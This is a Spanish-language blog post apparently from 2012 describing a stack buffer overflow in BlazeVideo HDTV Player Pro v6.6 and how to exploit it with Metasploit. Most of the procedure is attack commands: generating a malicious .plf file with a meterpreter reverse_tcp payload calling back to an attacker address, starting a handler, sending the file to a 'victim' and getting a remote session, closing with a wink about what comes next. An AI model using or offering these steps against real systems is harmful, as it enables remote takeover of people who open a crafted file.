sábado, 1 de diciembre de 2012

Exploiting Windows 8 - 7 with BlazeVideo HDTV Player Pro v6.6 Filename Handling Vulnerability




BlazeVideo HDTV Player es una completa herramienta de reproducción de vídeo que permite no sólo disfrutar de nuestras películas favoritas en DVD, sino también sintonizar televisión de alta definición a través de la tarjeta sintonizadora de TV. El programa esta disponible para Windows 8 - 7 y es usado por muchos usuarios que se dedican al mundo de la multimedia en Internet ya que cuenta con una elegante interfaz personalizable mediante skins, muy intuitiva y de sencillo manejo. 

Como todo buen programa, los investigadores de seguridad siempre se toman un poco de tiempo para realizarle un análisis de seguridad con el fin de conseguir un agujero que nos permita vulnerar el programa y aprovecharnos del sistema operativo en la cual se encuentra instalado.

Tal es el caso, que el día 30 de Noviembre, se reporto una vulnerabilidad en dicho programa denominado BlazeVideo HDTV Player Pro v6.6 Filename Handling Vulnerability, la cual  como es de costumbre y conocimiento, inmediatamente se integro en los módulos de Metasploit 

El módulo se aprovecha de una vulnerabilidad encontrada en la rutina de manejo de BlazeVideo HDTV Player. Al suministrar una serie de datos de entrada incrustado en un archivo .plf, el componente MediaPlayerCtrl.dll intentará extraer un nombre de archivo usando PathFindFileNameA(), y luego copia lo que el valor de retorno está en la pila mediante el uso de inline strcpy. Como resultado, si los datos de entrada es lo suficientemente largo, puede causar un desbordamiento del búfer basado en la pila, lo que puede provocar la ejecución de código arbitrario en el contexto del usuario.

REQUERIMIENTOS:

  • Backtrack 5 R1 - R2 o R3 (Atacante)
  • Metasploit Framework (Atacante)
  • Windows 7 - 8 (Victima)
  • BlazeVideo HDTV Player Pro v6.6.0.3 (Victima)


PROCEDIMIENTOS:

Actualizamos nuestro Metasploit con msfupdate para obtener los nuevos exploits, en la cual se encuentra el blazedvd_hdtv_bof (exploit para Blaze Video) luego ejecutamos msfconsole y tecleamos los siguientes comandos:

-------------------------------------------------------------------------------------------------------------
use exploit/windows/fileformat/blazedvd_hdtv_bof
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.34
exploit
-------------------------------------------------------------------------------------------------------------


Estos comandos crearan un archivo con extension .plf (formato de video) la cual se almacena en /root/.msf4/local/ con el nombre msf.plf por lo tanto dicho archivo sera enviada a nuestra victima. 


Seguidamente tenemos que crear la conexión inversa, para que cuando la victima ejecute el archivo .plf que hemos enviado, esta nos devuelva dicha conexion, para tal caso usaremos los siguientes comandos:

-------------------------------------------------------------------------------------------------------------
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.34
exploit
-------------------------------------------------------------------------------------------------------------

A continuación la victima tiene que ejecutar el programa BlazeVideo HDTV Player y desde allí abrir el archivo msf.plf que en este caso hemos enviado, como se aprecia en la siguiente imagen:


Si la victima ejecuta dicho archivo, automáticamente el payload se inyectara en el sistema y nos devolverá una session meterpreter.


Lo demás ya queda a nuestra imaginación ;)

Un saludo.

2 comentarios:

  1. Failed to load module,a que se debe? por cierto ya hice msfupdate.

    ResponderEliminar